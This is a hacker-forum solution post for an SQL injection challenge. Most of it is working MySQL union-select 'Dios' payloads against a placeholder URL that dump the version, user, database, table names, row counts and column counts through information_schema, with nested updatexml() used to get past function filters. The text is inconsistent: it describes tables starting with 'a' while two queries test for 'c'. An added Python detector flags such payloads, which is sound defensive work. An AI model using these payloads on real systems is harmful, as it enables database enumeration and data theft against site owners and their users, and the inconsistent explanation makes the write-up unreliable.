[Kashmiri_Wolf] Sqli Challenge 12 [Solution]

Ok, I Guess This Is The Moment Most Of You Guys Were Waiting For! Here Is The Solution Of My 12th Challenge!

Here Is Link
Challenge No 12

Let's Have A Look At Tasks Vs Rules

Tasks :

1. Print Your Name With Version
2. Print User And DB
3. Print Tables Starting With 'a' With Their Records
4. Print Other Tables
5. None Of Your Tables Should Repeat
6. Get Table Records And No Of Columns For Other Tables Which Are Not Starting With 'a'
7. Skip The Table Where Records Are Zero (Not Starting With A) And Show That Table Which Is Skipped And Show That In Preformatted Text (Check PoC)

Rules :
Use Dios
You May Not Use Replace,Insert,concat_ws,group_concat,make_set,export_set
You May Use concat(Once For Dios Only)
You May Not Try To Manipulate Data To get Tasks 3 and 4 By using some limiting functions
Your Query May Not Contain More Than 4 Selects (+1 For UniON SelEct)
You May Not Declare More Than One Variable (Only For Dios)
You May Not Use count() More Than Once
Don't Use Any Function Before Dios's concat
Don't Use Like/Regexp/find_in_set/position/locate Function For Task 3
Don't Use group by/order by

PS:

Nested Function Is allowed But For Dios Use Only Concat

I Will Just Explain Tasks 3, 4, 7

Let's Start :

We Will Mostly Use The If Function Here

if(condition,if_true,if_false)

Let's Dios First


PHP Code:
site.com/some.php?some=5 union select 1,2,3,(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())and(@a)in(@a:=concat(@a,table_name,'<br>'))))a),5,6-- -


Ok, It's Working

Let's Print Those Tables Which Are Starting With A
For That We Will Use The Left() Function

Left(str,length)


PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())and(@a)in(@a:=concat(@a,if(left(table_name,1)='c',table_name,0x00)))))a


Now Let's Print Table Records With Tables Starting With 'A'


PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())and(@a)in(@a:=concat(@a,if(left(table_name,1)='a',updatexml(updatexml('<br/><b></b> :: Table Records ~~> <c></c>','/b',table_name),'/c',table_rows),0x00)))))a


Now Let's Complete The Task "If table_rows = 0, Skip Them And Print Them In Preformatted Text"

For This We Would Use if(table_rows=0,concat('<pre>Table ',table_name,' Skipped</pre>'),0x00)

But We Can't Use Concat Here Because It's Blocked In The Rules, So Let's Use "updatexml()"

And Here's The Final Query


PHP Code:
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.tables)where(table_schema=database())
and(@a)in(@a:=concat(if(@a=0x00,'Kashmiri_Wolf ::',0x00),if(@a=0x00,version(),0x00),if(@a=0x00,'<br>',0x00),
if(@a=0x00,user(),0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,database(),0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,'<br>',0x00),if(@a=0x00,'Tables Starting With A <br> ',0x00),@a,
if(left(table_name,1)='c',updatexml(updatexml('<b></b> :: Table Records ~~> <c></c>','/b',table_name),'/c',table_rows),
if(table_rows=0,updatexml(updatexml('<br /><pre />Table :: "<a></a><b></b>',+'/a',table_name),'/b','" Skipped</pre>'),
updatexml(updatexml(updatexml('<font color=red>Other Tables ~~> </font><a></a><font color=red > :: Table Records ~~> </font><b></b><font color=red > No Of Columns ~~> </font><c></c>','/a',@Col:=table_name),'/b',table_rows),'/c',(select count(*) from information_schema.columns where table_name=@Col)))),0x3c62723e))))a
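
A defender's view of the queries above, as an added example that is not part of the original post: a Python detector that scores request query strings for the structural traits these Dios payloads share. The indicator names, the alert rule and the sample strings (two of them shortened from the queries above) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators key on what a Dios payload must do (assign a user variable while
# reading the schema catalog), not on a function blocklist: the final query
# swaps concat() for nested updatexml() to build its output strings.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b"),
    "schema_catalog": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "uservar_assign": re.compile(r"@`?\w+`?\s*:="),
    "xml_templating": re.compile(r"\bupdatexml\s*\(\s*updatexml\s*\("),
    "fingerprint_fn": re.compile(r"\b(version|user|database)\s*\(\s*\)"),
}

def normalize(raw_query):
    """URL-decode (twice, for double encoding), collapse whitespace, lowercase."""
    text = unquote_plus(unquote_plus(raw_query))
    return re.sub(r"\s+", " ", text).lower()

def score_request(raw_query):
    """Return the sorted names of the indicators found in one query string."""
    text = normalize(raw_query)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_dios_like(raw_query):
    """Alert only when a variable assignment coincides with a catalog read."""
    return {"uservar_assign", "schema_catalog"} <= set(score_request(raw_query))

# Constructed query strings: two benign, two shortened from the queries above.
SAMPLES = [
    "some=5",
    "q=union+select+committee+minutes",
    "some=5%20union%20select%201,2,3,(select(@a)from(select(@a:=0x00),"
    "(select(@a)from(information_schema.tables)where(table_schema=database())"
    "and(@a)in(@a:=concat(@a,table_name,'<br>'))))a),5,6--%20-",
    "some=5%20union%20select%201,(select(@a)from(select(@a:=0x00),"
    "(select(@a)from(information_schema.tables)where(@a)in(@a:=concat(@a,"
    "updatexml(updatexml('<b></b><c></c>','/b',table_name),'/c',table_rows)))))a)",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "ALERT" if is_dios_like(sample) else "ok"
        print(f"{verdict:5} {score_request(sample)} {sample[:50]}")
```

The second sample trips only the union/select indicator and does not alert, which is why the rule requires the variable assignment and the catalog read together.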



Sorry For Not Explaining It Much. A Lil Time. So Hope You Guys Can Understand

Greetz To r0ot h3x49,makman,benzi,rummy,ajkaro,cybrhckr,master Sniper,Cheetah


Regards

Kashmiri_Wolf


Allah Hafiz !
